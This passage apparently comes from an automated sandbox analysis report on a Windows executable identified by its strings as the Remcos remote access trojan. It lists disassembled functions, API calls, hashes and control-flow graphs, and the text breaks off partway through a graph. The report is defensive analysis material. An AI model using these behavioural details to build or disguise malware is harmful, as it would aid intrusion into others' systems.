                                                                                                                                                    • Opcode Fuzzy Hash: 2712c4415e38be0679b27d668322fe046b9821f6791b61a094527cd8398987ed
                                                                                                                                                    • Instruction Fuzzy Hash: 9501F47595030CBADB41EBA1CD41FCEB3FDEB48700F514462E641E6290EA75AF188A7D
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 02DF6D84 Relevance: 1.5, APIs: 1, Instructions: 48comCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 02DF6D28: CLSIDFromProgID.OLE32(00000000,?,00000000,02DF6D75,?,?,?,00000000), ref: 02DF6D55
                                                                                                                                                    • CoCreateInstance.OLE32(?,00000000,00000005,02DF6E68,00000000,00000000,02DF6DE7,?,00000000,02DF6E57), ref: 02DF6DD3
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1428399500.0000000002DE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1428298505.0000000002DE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1428558383.0000000002E0B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2de0000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CreateFromInstanceProg
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2151042543-0
                                                                                                                                                    • Opcode ID: 6e32cda663268fb10a6fa52639fa7b95bcfb57517ad9caa7f2dcf50fbd08acdc
                                                                                                                                                    • Instruction ID: e9a3bf2f38b3fae5984888e7671a45dd3402e2bac97988dc7eeb635f00032cf7
                                                                                                                                                    • Opcode Fuzzy Hash: 6e32cda663268fb10a6fa52639fa7b95bcfb57517ad9caa7f2dcf50fbd08acdc
                                                                                                                                                    • Instruction Fuzzy Hash: E401D4722047046EEB45EF61EC1286F7BADDB49B10F924435FA01D2B40F670DD14C9B8
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 1568E9C5 Relevance: 51.5, APIs: 14, Strings: 15, Instructions: 795COMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 5815 1568e9c5-1568ea47 call 1569cb50 GetModuleFileNameW call 1568f3c3 call 156820f6 * 2 call 1569be1b call 1568fb17 call 15681e8d call 156bfd00 5832 1568ea49-1568ea8e call 1568fbb3 call 15681e65 call 15681fab call 15690f37 call 1568fb64 call 1568f3b0 5815->5832 5833 1568ea93-1568eb5b call 15681e65 call 15681fab call 15681e65 call 1568531e call 15686383 call 15681fe2 call 15681fd8 * 2 call 15681e65 call 15681fc0 call 15685aa6 call 15681e65 call 156851e3 call 15681e65 call 156851e3 5815->5833 5859 1568eef2-1568ef03 call 15681fd8 5832->5859 5879 1568eb5d-1568eba8 call 15686c1e call 15681fe2 call 15681fd8 call 15681fab call 15693549 5833->5879 5880 1568ebae-1568ebc9 call 15681e65 call 1568b9bd 5833->5880 5879->5880 5912 1568f34f-1568f36a call 15681fab call 156939a9 call 15692475 5879->5912 5890 1568ebcb-1568ebea call 15681fab call 15693549 5880->5890 5891 1568ec03-1568ec0a call 1568d069 5880->5891 5890->5891 5907 1568ebec-1568ec02 call 15681fab call 156939a9 5890->5907 5900 1568ec0c-1568ec0e 5891->5900 5901 1568ec13-1568ec1a 5891->5901 5904 1568eef1 5900->5904 5905 1568ec1c 5901->5905 5906 1568ec1e-1568ec2a call 1569b2c3 5901->5906 5904->5859 5905->5906 5913 1568ec2c-1568ec2e 5906->5913 5914 1568ec33-1568ec37 5906->5914 5907->5891 5936 1568f36f-1568f3a0 call 1569bc5e call 15681f04 call 15693a23 call 15681f09 * 2 5912->5936 5913->5914 5917 1568ec39 call 15687716 5914->5917 5918 1568ec76-1568ec89 call 15681e65 call 15681fab 5914->5918 5926 1568ec3e-1568ec40 5917->5926 5939 1568ec8b call 15687755 5918->5939 5940 1568ec90-1568ed18 call 15681e65 call 1569bc5e call 15681f13 call 15681f09 call 15681e65 call 15681fab call 15681e65 call 15681fab call 15681e65 call 15681fab call 15681e65 call 15681fab 5918->5940 5929 1568ec4c-1568ec5f call 15681e65 call 15681fab 5926->5929 5930 1568ec42-1568ec47 call 15687738 call 15687260 5926->5930 5929->5918 5950 1568ec61-1568ec67 5929->5950 5930->5929 5967 1568f3a5-1568f3af call 1568dd42 call 15694f2a 5936->5967 5939->5940 5987 1568ed1a-1568ed33 call 15681e65 call 15681fab call 156bbad6 5940->5987 5988 1568ed80-1568ed84 5940->5988 5950->5918 5954 1568ec69-1568ec6f 5950->5954 5954->5918 5957 1568ec71 call 15687260 5954->5957 5957->5918 5987->5988 6015 1568ed35-1568ed61 call 15681e65 call 15681fab call 15681e65 call 15681fab call 1568da34 5987->6015 5990 1568ed8a-1568ed91 5988->5990 5991 1568ef06-1568ef66 call 156b6e90 call 1568247c call 15681fab * 2 call 156936f8 call 15689057 5988->5991 5994 1568ee0f-1568ee19 call 15689057 5990->5994 5995 1568ed93-1568ee05 call 15681e65 call 15681fab call 15681e65 call 15681fab call 15681e65 call 15681fab call 15681e65 call 15681fab call 15681e65 call 15681fab call 1568cdf9 5990->5995 6046 1568ef6b-1568efbf call 15681e65 call 15681fab call 15682093 call 15681fab call 1569376f call 15681e65 call 15681fab call 156bbaac 5991->6046 6001 1568ee1e-1568ee42 call 1568247c call 156b4798 5994->6001 6081 1568ee0a-1568ee0d 5995->6081 6022 1568ee51 6001->6022 6023 1568ee44-1568ee4f call 156b6e90 6001->6023 6057 1568ed66-1568ed7b call 15681f13 call 15681f09 6015->6057 6028 1568ee53-1568eec8 call 15681f04 call 156bf809 call 1568247c call 15681fab call 1568247c call 15681fab call 15693947 call 156b47a1 call 15681e65 call 1568b9bd 6022->6028 6023->6028 6028->6046 6096 1568eece-1568eeed call 15681e65 call 1569bc5e call 1568f474 6028->6096 6097 1568efdc-1568efde 6046->6097 6098 1568efc1 6046->6098 6057->5988 6081->6001 6096->6046 6116 1568eeef 6096->6116 6099 1568efe0-1568efe2 6097->6099 6100 1568efe4 6097->6100 6102 1568efc3-1568efda call 1569cd9b CreateThread 6098->6102 6099->6102 6104 1568efea-1568f0c6 call 15682093 * 2 call 1569b4ef call 15681e65 call 15681fab call 15681e65 call 15681fab call 15681e65 call 15681fab call 156bbaac call 15681e65 call 15681fab call 15681e65 call 15681fab call 15681e65 call 15681fab call 15681e65 call 15681fab StrToIntA call 15689de4 call 15681e65 call 15681fab 6100->6104 6102->6104 6154 1568f0c8-1568f0ff call 156b44ea call 15681e65 call 15681fab CreateThread 6104->6154 6155 1568f101 6104->6155 6116->5904 6157 1568f103-1568f11b call 15681e65 call 15681fab 6154->6157 6155->6157 6167 1568f159-1568f16c call 15681e65 call 15681fab 6157->6167 6168 1568f11d-1568f154 call 156b44ea call 15681e65 call 15681fab CreateThread 6157->6168 6178 1568f1cc-1568f1df call 15681e65 call 15681fab 6167->6178 6179 1568f16e-1568f1c7 call 15681e65 call 15681fab call 15681e65 call 15681fab call 1568d9e8 call 15681f13 call 15681f09 CreateThread 6167->6179 6168->6167 6189 1568f21a-1568f23e call 1569b60d call 15681f13 call 15681f09 6178->6189 6190 1568f1e1-1568f215 call 15681e65 call 15681fab call 15681e65 call 15681fab call 156bbaac call 1568c162 6178->6190 6179->6178 6210 1568f240 6189->6210 6211 1568f243-1568f256 CreateThread 6189->6211 6190->6189 6210->6211 6214 1568f258-1568f262 CreateThread 6211->6214 6215 1568f264-1568f26b 6211->6215 6214->6215 6218 1568f279-1568f280 6215->6218 6219 1568f26d-1568f277 CreateThread 6215->6219 6222 1568f28e 6218->6222 6223 1568f282-1568f285 6218->6223 6219->6218 6228 1568f293-1568f2c7 call 15682093 call 156852fd call 15682093 call 1569b4ef call 15681fd8 6222->6228 6225 1568f2cc-1568f2e7 call 15681fab call 156934ff 6223->6225 6226 1568f287-1568f28c 6223->6226 6225->5967 6237 1568f2ed-1568f32d call 1569bc5e call 15681f04 call 1569361b call 15681f09 call 15681f04 6225->6237 6226->6228 6228->6225 6253 1568f346-1568f34b DeleteFileW 6237->6253 6254 1568f34d 6253->6254 6255 1568f32f-1568f332 6253->6255 6254->5936 6255->5936 6256 1568f334-1568f341 Sleep call 15681f04 6255->6256 6256->6253
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 1569CB50: LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,?,1568E9E1), ref: 1569CB65
                                                                                                                                                      • Part of subcall function 1569CB50: GetProcAddress.KERNEL32(00000000), ref: 1569CB6E
                                                                                                                                                      • Part of subcall function 1569CB50: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,1568E9E1), ref: 1569CB85
                                                                                                                                                      • Part of subcall function 1569CB50: GetProcAddress.KERNEL32(00000000), ref: 1569CB88
                                                                                                                                                      • Part of subcall function 1569CB50: LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,1568E9E1), ref: 1569CB9A
                                                                                                                                                      • Part of subcall function 1569CB50: GetProcAddress.KERNEL32(00000000), ref: 1569CB9D
                                                                                                                                                      • Part of subcall function 1569CB50: LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,1568E9E1), ref: 1569CBAE
                                                                                                                                                      • Part of subcall function 1569CB50: GetProcAddress.KERNEL32(00000000), ref: 1569CBB1
                                                                                                                                                      • Part of subcall function 1569CB50: LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,1568E9E1), ref: 1569CBC3
                                                                                                                                                      • Part of subcall function 1569CB50: GetProcAddress.KERNEL32(00000000), ref: 1569CBC6
                                                                                                                                                      • Part of subcall function 1569CB50: LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,1568E9E1), ref: 1569CBD2
                                                                                                                                                      • Part of subcall function 1569CB50: GetProcAddress.KERNEL32(00000000), ref: 1569CBD5
                                                                                                                                                      • Part of subcall function 1569CB50: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,1568E9E1), ref: 1569CBE6
                                                                                                                                                      • Part of subcall function 1569CB50: GetProcAddress.KERNEL32(00000000), ref: 1569CBE9
                                                                                                                                                      • Part of subcall function 1569CB50: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,1568E9E1), ref: 1569CBFA
                                                                                                                                                      • Part of subcall function 1569CB50: GetProcAddress.KERNEL32(00000000), ref: 1569CBFD
                                                                                                                                                      • Part of subcall function 1569CB50: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,1568E9E1), ref: 1569CC0E
                                                                                                                                                      • Part of subcall function 1569CB50: GetProcAddress.KERNEL32(00000000), ref: 1569CC11
                                                                                                                                                      • Part of subcall function 1569CB50: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,1568E9E1), ref: 1569CC22
                                                                                                                                                      • Part of subcall function 1569CB50: GetProcAddress.KERNEL32(00000000), ref: 1569CC25
                                                                                                                                                      • Part of subcall function 1569CB50: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,1568E9E1), ref: 1569CC36
                                                                                                                                                      • Part of subcall function 1569CB50: GetProcAddress.KERNEL32(00000000), ref: 1569CC39
                                                                                                                                                      • Part of subcall function 1569CB50: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,1568E9E1), ref: 1569CC4A
                                                                                                                                                      • Part of subcall function 1569CB50: GetProcAddress.KERNEL32(00000000), ref: 1569CC4D
                                                                                                                                                      • Part of subcall function 1569CB50: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,1568E9E1), ref: 1569CC5E
                                                                                                                                                      • Part of subcall function 1569CB50: GetProcAddress.KERNEL32(00000000), ref: 1569CC61
                                                                                                                                                      • Part of subcall function 1569CB50: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,1568E9E1), ref: 1569CC72
                                                                                                                                                      • Part of subcall function 1569CB50: GetProcAddress.KERNEL32(00000000), ref: 1569CC75
                                                                                                                                                      • Part of subcall function 1569CB50: LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,1568E9E1), ref: 1569CC83
                                                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\fu56fbrtn8.exe,00000104), ref: 1568E9EE
                                                                                                                                                      • Part of subcall function 15690F37: __EH_prolog.LIBCMT ref: 15690F3C
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
                                                                                                                                                    • String ID: Access Level: $Administrator$C:\Users\user\Desktop\fu56fbrtn8.exe$Exe$Exe$Inj$Remcos Agent initialized$Rmc-VLI916$Software\$User$del$del$exepath$licence$license_code.txt
                                                                                                                                                    • API String ID: 2830904901-2983409021
                                                                                                                                                    • Opcode ID: b19611d892302b43d16c517cd3a7787f7faa74f8a51f89bcb3f167d7b4bbc6c6
                                                                                                                                                    • Instruction ID: f61ce493132f212180021967d5080d1bbf12e68b231c5eed59cfc26ad6b3be26
                                                                                                                                                    • Opcode Fuzzy Hash: b19611d892302b43d16c517cd3a7787f7faa74f8a51f89bcb3f167d7b4bbc6c6
                                                                                                                                                    • Instruction Fuzzy Hash: 0B32E778F06345AFDA18AB709C79B6E26DA5F91640F84041DE6436B3C0EE79BD01C3E9
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 02E01AC0 Relevance: 46.7, APIs: 2, Strings: 23, Instructions: 2959sleepprocessCOMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 6258 2e01ac0-2e02d78 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4da4 * 2 call 2de4728 call 2dfc3f8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2dfc74c call 2de44f4 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4da4 * 2 call 2de4728 call 2dfc3f8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2dfc74c call 2de44f4 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4da4 * 2 call 2de4728 call 2dfc3f8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2dfc74c call 2de44f4 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4da4 * 2 call 2de4728 call 2dfc3f8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4964 call 2de4698 call 2de7e18 6767 2e03345-2e03c13 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2dfc78c call 2de44f4 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de7a88 call 2dfd270 call 2de44f4 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2dfd198 call 2dfd20c call 2de44f4 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de48b0 6258->6767 6768 2e02d7e-2e0333a call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4964 call 2de3208 call 2dfca6c call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 Sleep call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4964 call 2de4d38 call 2dfc368 call 2de4964 call 2de4d38 call 2dfc368 call 2de4964 call 2de4d38 call 2dfc368 call 2de4964 call 2de4d38 call 2dfc368 call 2de4964 call 2de4d38 call 2dfc368 call 2de4964 call 2de4d38 call 2dfc368 call 2de4d38 call 2dfc368 call 2de4d38 call 2dfc368 call 2de4d38 call 2dfc368 call 2de4d38 6258->6768 7208 2e053e0-2e0565b call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de48b0 6767->7208 7209 2e03c19-2e03c5e call 2de4824 call 2de4964 call 2de4698 call 2de7e18 6767->7209 6768->6767 7133 2e03340 call 2dfc368 6768->7133 7133->6767 7354 2e06190-2e0638f call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de48b0 7208->7354 7355 2e05661-2e05c06 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de47b0 call 2de4964 WinExec call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4964 call 2de4698 call 2df9e70 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de3694 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 7208->7355 7209->7208 7227 2e03c64-2e04465 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 WinExec call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 7209->7227 8003 2e0446a-2e044d5 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 7227->8003 7533 2e06b54-2e06cd7 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de48b0 7354->7533 7534 2e06395-2e06711 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de2ee0 call 2de2f08 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 7354->7534 8002 2e05c0b-2e05cb3 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 7355->8002 7712 2e074a8-2e08b96 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4698 * 2 call 2df7be8 call 2de4698 * 2 call 2df7be8 call 2de4698 * 2 call 2df7be8 call 2de4698 * 2 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4698 * 2 call 2df7be8 call 2de4698 * 2 call 2df7be8 call 2de4698 * 2 call 2df7be8 call 2de4698 * 2 call 2df7be8 call 2de4698 * 2 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4698 * 2 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4698 * 2 call 2df7be8 call 2de4698 * 2 call 2df7be8 call 2de4698 * 2 call 2df7be8 call 2de4698 * 2 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4698 * 2 call 2df7be8 call 2de4698 * 2 call 2df7be8 call 2de4698 * 2 call 2df7be8 call 2de4698 * 2 call 2df7be8 call 2de4698 * 2 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 